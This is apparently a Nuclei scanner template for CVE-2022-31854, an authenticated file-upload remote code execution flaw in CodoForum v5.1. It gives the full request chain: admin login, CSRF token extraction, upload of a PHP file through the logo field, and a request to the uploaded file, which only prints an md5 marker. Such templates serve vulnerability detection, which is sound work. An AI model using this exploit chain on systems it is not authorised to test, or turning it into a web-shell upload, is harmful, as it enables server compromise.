id: CVE-2022-31854

info:
  name: CodoForum v5.1 - Remote Code Execution
  author: theamanrawat
  severity: high
  description: |
    Codoforum v5.1 was discovered to contain an arbitrary file upload vulnerability via the logo change option in the admin panel.
  reference:
    - https://bitbucket.org/evnix/codoforum_downloads/downloads/codoforum.v.5.1.zip
    - https://nvd.nist.gov/vuln/detail/CVE-2022-31854
    - https://codoforum.com
    - https://vikaran101.medium.com/codoforum-v5-1-authenticated-rce-my-first-cve-f49e19b8bc
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2022-31854
    cwe-id: CWE-434
  metadata:
    verified: "true"
  tags: cve,cve2022,rce,codoforumrce,authenticated

requests:
  - raw:
      - |
        POST /admin/?page=login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryACGPpj7UIqmtLNbB

        ------WebKitFormBoundaryACGPpj7UIqmtLNbB
        Content-Disposition: form-data; name="username"

        {{username}}
        ------WebKitFormBoundaryACGPpj7UIqmtLNbB
        Content-Disposition: form-data; name="password"

        {{password}}
        ------WebKitFormBoundaryACGPpj7UIqmtLNbB--

      - |
        GET /admin/index.php?page=config HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /admin/index.php?page=config HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoLtdjuqj2ixPvBhA

        ------WebKitFormBoundaryoLtdjuqj2ixPvBhA
        Content-Disposition: form-data; name="site_title"


        ------WebKitFormBoundaryoLtdjuqj2ixPvBhA
        Content-Disposition: form-data; name="forum_logo"; filename="{{randstr}}.php"
        Content-Type:  application/x-httpd-php

        <?php

        echo md5('CVE-2022-31854');

        ?>
        ------WebKitFormBoundaryoLtdjuqj2ixPvBhA
        Content-Disposition: form-data; name="CSRF_token"

        {{csrf}}
        ------WebKitFormBoundaryoLtdjuqj2ixPvBhA--

      - |
        GET /sites/default/assets/img/attachments/{{randstr}}.php HTTP/1.1
        Host: {{Hostname}}

    cookie-reuse: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code_4 == 200'
          - 'contains(content_type_4, "text/html")'
          - 'contains(body_4, "a63fd49130de6406a66600cd8caa162f")'
        condition: and

    extractors:
      - type: regex
        name: csrf
        group: 1
        regex:
          - 'name="CSRF_token" value="([0-9a-zA-Z]+)"/>'
        internal: true